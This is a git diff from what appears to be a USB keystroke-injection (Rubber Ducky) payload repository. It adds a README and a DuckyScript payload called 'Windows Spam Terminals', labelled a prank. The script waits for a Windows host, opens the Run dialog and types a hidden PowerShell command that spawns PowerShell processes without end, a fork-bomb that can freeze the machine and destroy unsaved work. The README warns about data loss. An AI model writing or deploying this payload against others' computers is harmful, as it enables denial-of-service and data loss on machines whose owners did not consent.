REM Author: UberGuidoZ
|
REM Author: UberGuidoZ
|
||||||
REM Target: Windows (including Powershell 2.0 or above)
|
REM Target: Windows (including Powershell 2.0 or above)
|
||||||
|
REM Version: v1.1
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 3000
|
DELAY 3000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 750
|
DELAY 750
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Windows Spam Terminals
|
||||||
|
|
||||||
|
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
|
||||||
|
|
||||||
|
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Windows Spam Terminals
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: Windows
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
This payload is plug and play <3
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
|
||||||
|
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Windows Spam Terminals #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
|
Loading…
Reference in New Issue